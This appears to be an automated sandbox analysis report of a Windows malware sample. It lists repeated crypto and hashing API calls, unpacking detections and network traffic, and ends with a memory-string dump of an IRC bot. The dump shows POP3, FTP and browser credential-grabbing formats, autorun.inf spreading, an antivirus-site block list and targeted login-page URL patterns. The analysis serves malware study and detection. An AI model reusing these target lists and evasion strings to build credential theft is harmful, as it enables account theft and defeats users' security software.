            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 21_2_00511EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,21_2_00511EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 21_2_00518B30 memset,EncryptMessage,21_2_00518B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 22_2_00198C90 memset,WSAGetLastError,DecryptMessage,22_2_00198C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 22_2_00191EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,22_2_00191EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 22_2_00198B30 memset,EncryptMessage,22_2_00198B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 23_2_00848C90 memset,WSAGetLastError,DecryptMessage,23_2_00848C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 23_2_00841EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,23_2_00841EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 23_2_00848B30 memset,EncryptMessage,23_2_00848B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 25_2_00408C90 memset,WSAGetLastError,DecryptMessage,25_2_00408C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 25_2_00401EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,25_2_00401EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 25_2_00408B30 memset,EncryptMessage,25_2_00408B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 26_2_00828C90 memset,WSAGetLastError,DecryptMessage,26_2_00828C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 26_2_00821EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,26_2_00821EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 26_2_00828B30 memset,EncryptMessage,26_2_00828B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 27_2_00098C90 memset,WSAGetLastError,DecryptMessage,27_2_00098C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 27_2_00091EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,27_2_00091EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 27_2_00098B30 memset,EncryptMessage,27_2_00098B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 29_2_005D8C90 memset,WSAGetLastError,DecryptMessage,29_2_005D8C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 29_2_005D1EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,29_2_005D1EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 29_2_005D8B30 memset,EncryptMessage,29_2_005D8B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 30_2_00098C90 memset,WSAGetLastError,DecryptMessage,30_2_00098C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 30_2_00091EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,30_2_00091EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 30_2_00098B30 memset,EncryptMessage,30_2_00098B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 31_2_00918C90 memset,WSAGetLastError,DecryptMessage,31_2_00918C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 31_2_00911EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,31_2_00911EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 31_2_00918B30 memset,EncryptMessage,31_2_00918B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 32_2_00391EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,32_2_00391EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 32_2_00398C90 memset,WSAGetLastError,DecryptMessage,32_2_00398C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 32_2_00398B30 memset,EncryptMessage,32_2_00398B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 33_2_00098C90 memset,WSAGetLastError,DecryptMessage,33_2_00098C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 33_2_00091EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,33_2_00091EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 33_2_00098B30 memset,EncryptMessage,33_2_00098B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 34_2_00221EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,34_2_00221EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 34_2_00228C90 memset,WSAGetLastError,DecryptMessage,34_2_00228C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 34_2_00228B30 memset,EncryptMessage,34_2_00228B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 35_2_00158C90 memset,WSAGetLastError,DecryptMessage,35_2_00158C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 35_2_00151EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,35_2_00151EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 35_2_00158B30 memset,EncryptMessage,35_2_00158B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 36_2_007F1EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,36_2_007F1EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 36_2_007F8C90 memset,WSAGetLastError,DecryptMessage,36_2_007F8C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 36_2_007F8B30 memset,EncryptMessage,36_2_007F8B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 37_2_00251EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,37_2_00251EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 37_2_00258C90 memset,WSAGetLastError,DecryptMessage,37_2_00258C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 37_2_00258B30 memset,EncryptMessage,37_2_00258B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 38_2_00261EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,38_2_00261EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 38_2_00268C90 memset,WSAGetLastError,DecryptMessage,38_2_00268C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 38_2_00268B30 memset,EncryptMessage,38_2_00268B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 39_2_003F1EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,39_2_003F1EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 39_2_003F8C90 memset,WSAGetLastError,DecryptMessage,39_2_003F8C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 39_2_003F8B30 memset,EncryptMessage,39_2_003F8B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 40_2_003F1EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,40_2_003F1EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 40_2_003F8C90 memset,WSAGetLastError,DecryptMessage,40_2_003F8C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 40_2_003F8B30 memset,EncryptMessage,40_2_003F8B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 41_2_00281EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,41_2_00281EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 41_2_00288C90 memset,WSAGetLastError,DecryptMessage,41_2_00288C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 41_2_00288B30 memset,EncryptMessage,41_2_00288B30
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 42_2_00108C90 memset,WSAGetLastError,DecryptMessage,42_2_00108C90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 42_2_00101EA0 CreateFileW,GetLastError,CryptAcquireContextA,GetLastError,CloseHandle,CryptCreateHash,GetLastError,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,ReadFile,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,GetLastError,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,GetLastError,42_2_00101EA0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 42_2_00108B30 memset,EncryptMessage,42_2_00108B30

            Compliance

            barindex
            Detected unpacking (creates a PE file in dynamic memory)
            Source: C:\Users\user\Desktop\25F.tmp.exeUnpacked PE file: 2.2.25F.tmp.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\25F.tmp.exeUnpacked PE file: 4.2.25F.tmp.exe.360000.0.unpack
            Source: C:\Users\user\Desktop\25F.tmp.exeUnpacked PE file: 4.2.25F.tmp.exe.400000.1.unpack
            Source: 25F.tmp.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
            Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.22:49181 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.22:49180 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.22:49175 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.22:49174 version: TLS 1.2
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QgGhoOpxHPl.exe, 00000009.00000002.624007678.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000A.00000002.623894475.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000B.00000002.624028617.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000C.00000002.624002687.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000D.00000002.623566344.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000E.00000002.624079839.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000F.00000002.623632104.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000010.00000002.623656498.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000011.00000000.386197187.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000012.00000002.623647954.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000013.00000002.623981000.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000014.00000000.387583156.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000015.00000002.623920086.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000016.00000002.623820405.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000017.00000000.391050949.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000019.00000002.623538208.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000001A.00000000.391969074.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000001B.00000000.392217468.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000001D.00000000.392771743.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000001E.00000002.623775125.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000001F.00000000.393702318.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000020.00000000.394071706.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000021.00000000.394366434.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000022.00000000.394702338.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000023.00000000.394946970.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000024.00000000.395128308.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000025.00000002.623951188.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000026.00000000.395491250.000000000123E000.00000002.00000001.01000000.00000005.sdmp, Qg
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 10_2_0018FB60 RegisterClassExA,CreateWindowExA,RegisterDeviceNotificationA,GetMessageA,GetMessageA,TranslateMessage,TranslateMessage,DispatchMessageA,GetMessageA,10_2_0018FB60
            Source: 25F.tmp.exe, 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: 25F.tmp.exe, 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: 25F.tmp.exe, 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginP